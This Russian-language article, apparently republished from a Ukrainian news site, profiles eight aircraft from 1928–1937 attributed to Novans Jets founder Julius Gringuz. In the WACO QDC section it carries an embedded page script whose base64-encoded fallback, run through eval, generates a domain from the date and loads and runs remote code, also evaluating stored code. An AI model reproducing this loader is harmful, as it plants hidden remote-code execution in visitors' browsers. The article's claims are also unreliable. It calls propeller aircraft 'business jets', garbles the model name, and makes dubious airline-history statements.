В свое время у авиации было много высококлассных пилотов: братья Райт в 1903 году, Чарльз Линдберг на Spirit of St. Louis в 1927 году, Амелия Эрхарт на ее Lockheed Model 10-Electra в 1937 году, Чак Йегер в 1940-х и 50-х годах и прочее. На заднем плане, вдали от заголовков и всемирных похвал, стояли изобретатели самолетов, которые продвигали авиацию вперед с постоянными инновациями и свежими конструкциями. Основатель компании Novans Jets, Юлий Грингуз, выделил несколько бизнес-джетов прошлого века, которые сделали большой вклад в авиастроение.
Bellanca «Pacemaker» CH-300
Дизайны Джузеппе Марио Белланки считались радикальными для того времени. Pacemaker был чемпионом по поднятию тяжестей, а дальнобойный самолет считался самым желанным бизнес-джетом своего времени. Это также повлияло на производительность. CH-300 установил рекорды выносливости, расстояния и высоты, успешно совершая длительные беспосадочные перелеты, такие как поездка 1931 года из Нью-Йорка в Стамбул, которая заняла 49 часов 20 минут.
Белланка считал, что все поверхности должны быть объемными. Помимо подкосов, крыльев и шасси, даже фюзеляж имеет форму крыла. CH-300 был первым самолетом компании Hawaiian Airlines, которая также основала компанию Star Airlines, что позже стала Alaskan Airlines. Если позволяет погода, Hawaiian по-прежнему использует свой CH-300 для ежедневных VIP-поездок.
«Легенда авиастроительной мысли — Bellanca «Pacemaker» CH-300, 1929 г.», — отметил July Gringuz, основатель компании Novans Jets
Laird LCB-200
Эмиль Мэтью Лэрд не только создал одни из лучших бизнес-джетов в мире во время становления отрасли, но и конструктор-самоучка, пилот, а также проводил модификации самолетов для других компаний. LCB-200 олицетворяет превосходный замысел Лэрда.
Нацеленный на рынок спортсменов и пилотов, этот самолет отличался изумительной управляемостью и пользовался восхитительными откликами среди пилотов в период его производства с 1928 по 1935 год. Хотя, он каким-то образом ушел от разговора о современном дизайне самолетов. Интересно, что Клайд Сессна, Уолтер Бук и Ллойд Стирманы — три титана истории авиации — все работали на Лэрда в начале своей карьеры.
Laird LCB-200, 1928 г.
Читайте также: 10 популярных направлений, куда летают на чартерных рейсах из Киева
Pitcairn PCA-2 Autogiro
Ни вертолет, ни самолет, PCA-2 стал «изюминкой» в мире авиастроения. PCA-2 — первый коммерческий, специально сконструированный винтокрылый самолет в США, привлекал большое внимание, где бы он ни летал. Несмотря на то, мир увидел лишь небольшое количество примеров этой модели, некоторые компании выстраивались в очередь для покупки из-за его рыночной привлекательности.
Будучи неспособным к зависанию или вертикальному взлету, Pitcairn мог работать в таких местах, где самолет с неподвижным крылом никогда бы не оказался. PCA-2, вероятно, воспламеняет воображение дизайнеров и создает то, что мы теперь называем вертолетом.
Pitcairn PCA-2 Autogiro — самый неординарный бизнес-джет, по мнению основателя компании Novans Jets Юлия Грингуза
WACO QDC
Компания WACO Aircraft из Трои, штат Огайо, добилась огромных успехов в создании самолетов с открытой кабиной для множества нужд. Почувствовав развитие рынка и новые возможности, WACO переработала популярную модель с открытой кабиной в закрытую кабину под названием QDC.
Разработанный как бизнес-инструмент и одновременно семейный самолет с экономичной ценой и эксплуатационными расходами, QDC был первым в линейке самолетов WACO с «кабиной». ODC по скорости, грузоподъемности и комфорту по-прежнему соперничает с современной Cessna 172. Учитывая, что она была выпущена в 1931 году, это впечатляющий результат. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
WACO QDC, 1931
Luscombe 8 Series
Дон Ласкомб произвел революцию в конструкции легких самолетов, придумав цельнометаллический самолет, который можно было производить серийно. «Ни дерева, ни гвоздей, ни клея», — гласит пословица, связанная с самолетом. Ласкомб создал авиалайнер с фюзеляжем на основе «обшивки» и металлическими крыльями. Это был огромный отход от традиционных способов авиастроения.
Серия 8 охватывает период от «довоенной» до «послевоенной» истории, при этом наибольшие переменные между моделями — это двигатели и запас топлива. Многие Luscombes по-прежнему считаются отличными легкими самолетами для личного пользования.
Luscombe 8 Series, 1937
Beechcraft D17S
Уолтер Бич и Тед Уэллс намеревались разработать самолет, который мог бы летать со скоростью 200 миль в час и приземляться на скорости 60 миль в час. В то время это было редкостью для личного самолета. Форма следовала за функцией при разработке культовой серии «Staggerwing», что привело к целому ряду вариантов. «Staggerwing» часто называют одним из самых красивых самолетов, когда-либо построенных.
Быстрый, маневренный и дорогой самолет имеет несколько уникальных показателей: управляемость и устойчивость. Военные заказали большое количество D17S, что дало Beech финансовый импульс для роста, необходимого в начале 1940-х годов.
Beechcraft D17S, 1937
Stinson Reliant SR-9
Стинсон построил надежный, сильный, комфортабельный самолет с превосходными аэродинамическими характеристиками. Модель стала самой эстетичной версией SR-9 в 1937 году. В свое время, SR-9 был прототипом современного Gulfstream. Хотя он и не был самым быстрым бизнес-джетом, он пользовался большим спросом за его комфорт и летные качества.
Динамическое крыло обеспечивает идеальный контроль во всем диапазоне скоростей самолета, обеспечивая при этом превосходный комфорт полета. Оцененный в колоссальные 10 000 долларов в 1937 году — или около трех средних домов — SR-9 привлекал многие корпорации и состоятельных людей.
Читайте также: 10 самых дорогих бизнес-джетов в мире
Stinson Reliant SR-9, 1937
Можно еще долго говорить о лучших бизнес-джетах минувшего века, но суть остается одна – авиастроение было и остается передовой отраслью транспортной системы для корпоративных целей. (adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/july-gringuz-rukovoditel-aviakompanii-novans-jets-vydelil-8-legendarnyh-biznes-samoletov-za-poslednie-100-let/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook